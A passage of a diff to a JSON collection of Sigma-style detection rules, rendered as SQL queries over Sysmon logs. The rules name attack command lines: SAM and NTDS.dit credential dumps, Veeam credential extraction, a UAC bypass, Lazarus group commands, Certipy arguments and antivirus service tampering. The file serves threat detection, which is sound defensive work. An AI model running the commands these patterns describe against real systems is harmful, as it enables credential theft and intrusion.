'\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\client32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_netsupport_rat.yml" + "filename": "proc_creation_win_rundll32_keymgr.yml" }, { - "title": "Windows Admin Share Mount Via Net.EXE", - "id": "3abd6094-7027-475f-9630-8ab9be7b9725", - "status": "test", - "description": "Detects when an admin share is mounted using net.exe", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "stable", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Administrators" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '% \\\\%\\\\%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_net_use_mount_admin_share.yml" + "filename": "proc_creation_win_exploit_cve_2015_1641.yml" }, { - "title": "Sensitive Registry Access via Volume Shadow Copy", - "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "status": "experimental", - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "New User Created Via Net.EXE With Never Expire Option", + "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "status": "test", + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Some rare backup scenarios" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml" + "filename": "proc_creation_win_net_user_add_never_expire.yml" }, { - "title": "Nltest.EXE Execution", - "id": "903076ff-f442-475a-b667-4f246bcc203b", - "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Arun Chauhan", + "title": "Lazarus Group Activity", + "id": "24c4d154-05a4-4b99-b57d-9b977472443a", + "status": "test", + "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1018", - "attack.t1482" + "attack.g0032", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate administration activity" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_nltest_execution.yml" + "filename": "proc_creation_win_apt_lazarus_group_activity.yml" }, { - "title": "Exchange PowerShell Snap-Ins Usage", - "id": "25676e10-2121-446e-80a4-71ff8506af47", - "status": "experimental", - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", - "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", + "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", + "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", + "status": "test", + "description": "Detects dump of credentials in VeeamBackup dbo", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.collection", - "attack.t1114" + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml" + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" }, { - "title": "Winword LOLBIN Usage", - "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", - "status": "experimental", - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community", + "title": "UAC Bypass Using NTFS Reparse Point - Process", + "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND Image LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_winword.yml" + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "Suspicious Greedy Compression Using Rar.EXE", - "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "title": "HackTool - Certipy Execution", + "id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", "status": "experimental", - "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", - "author": "X__Junior, Florian Roth", + "description": "Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Certipy.exe' ESCAPE '\\' OR OriginalFileName = 'Certipy.exe' OR Description LIKE '%Certipy%' ESCAPE '\\') OR ((CommandLine LIKE '% auth %' ESCAPE '\\' OR CommandLine LIKE '% find %' ESCAPE '\\' OR CommandLine LIKE '% forge %' ESCAPE '\\' OR CommandLine LIKE '% relay %' ESCAPE '\\' OR CommandLine LIKE '% req %' ESCAPE '\\' OR CommandLine LIKE '% shadow %' ESCAPE '\\') AND (CommandLine LIKE '% -bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -ca-pfx %' ESCAPE '\\' OR CommandLine LIKE '% -dc-ip %' ESCAPE '\\' OR CommandLine LIKE '% -kirbi%' ESCAPE '\\' OR CommandLine LIKE '% -old-bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -pfx %' ESCAPE '\\' OR CommandLine LIKE '% -target%' ESCAPE '\\' OR CommandLine LIKE '% -username %' ESCAPE '\\' OR CommandLine LIKE '% -vulnerable%' ESCAPE '\\' OR CommandLine LIKE '%auth -pfx%' ESCAPE '\\' OR CommandLine LIKE '%shadow auto%' ESCAPE '\\' OR CommandLine LIKE '%shadow list%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rar_susp_greedy_compression.yml" + "filename": "proc_creation_win_hktl_certipy.yml" }, { - "title": "Hiding Files with Attrib.exe", - "id": "4281cb20-2994-4580-aa63-c8b86d019934", - "status": "test", - "description": "Detects usage of attrib.exe to hide files from users.", - "author": "Sami Ruohonen", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "status": "experimental", + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", - "Msiexec.exe hiding desktop.ini" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +h %' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\desktop.ini %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '+R +H +S +A \\\\\\*.cui' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_attrib_hiding_files.yml" + "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" }, { - "title": "User Discovery And Export Via Get-ADUser Cmdlet", - "id": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "title": "Use of UltraViewer Remote Access Software", + "id": "88656cec-6c3b-487c-82c0-f73ebb805503", "status": "experimental", - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADUser %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UltraViewer' OR Company = 'DucFabulous Co,ltd' OR OriginalFileName LIKE 'UltraViewer\\_Desktop.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml" + "filename": "proc_creation_win_remote_access_software_ultraviewer.yml" }, { - "title": "Suspicious Compression Tool Parameters", - "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "status": "test", - "description": "Detects suspicious command line arguments of common data compression tools", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Potential Download/Upload Activity Using Type Command", + "id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", + "status": "experimental", + "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > \\\\\\\\\\*' ESCAPE '\\') OR (CommandLine LIKE '%type \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_compression_params.yml" + "filename": "proc_creation_win_lolbin_type.yml" }, { - "title": "Rundll32 Registered COM Objects", - "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "title": "Suspicious Driver Install by pnputil.exe", + "id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", "status": "test", - "description": "load malicious registered COM objects", - "author": "frack113", + "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", + "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", "tags": [ - "attack.privilege_escalation", "attack.persistence", - "attack.t1546.015" + "attack.t1547" ], "falsepositives": [ - "Legitimate use" + "Pnputil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/install%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/add-driver%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\') AND Image LIKE '%\\\\pnputil.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_registered_com_objects.yml" + "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" }, { - "title": "DevInit Lolbin Download", - "id": "90d50722-0483-4065-8e35-57efaadd354d", - "status": "test", - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Product Class Reconnaissance Via Wmic.EXE", + "id": "e568650b-5dcd-4658-8f34-ded0b1e13992", + "status": "experimental", + "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", + "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%AntiVirusProduct%' ESCAPE '\\' OR CommandLine LIKE '%FirewallProduct%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devinit.yml" + "filename": "proc_creation_win_wmic_recon_product_class.yml" }, { - "title": "Process Dump via RdrLeakDiag.exe", - "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION", + "id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", "status": "test", - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "author": "Cedric MAURUGEON", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND OriginalFileName = 'RdrLeakDiag.exe' AND CommandLine LIKE '%fullmemdmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (CommandLine LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR CommandLine LIKE '%system.io.streamreader%' ESCAPE '\\' OR CommandLine LIKE '%readtoend(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" }, { - "title": "Change Default File Association To Executable Via Assoc", - "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "title": "Suspicious Windows Service Tampering", + "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", "status": "experimental", - "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.persistence", - "attack.t1546.001" + "attack.defense_evasion", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE 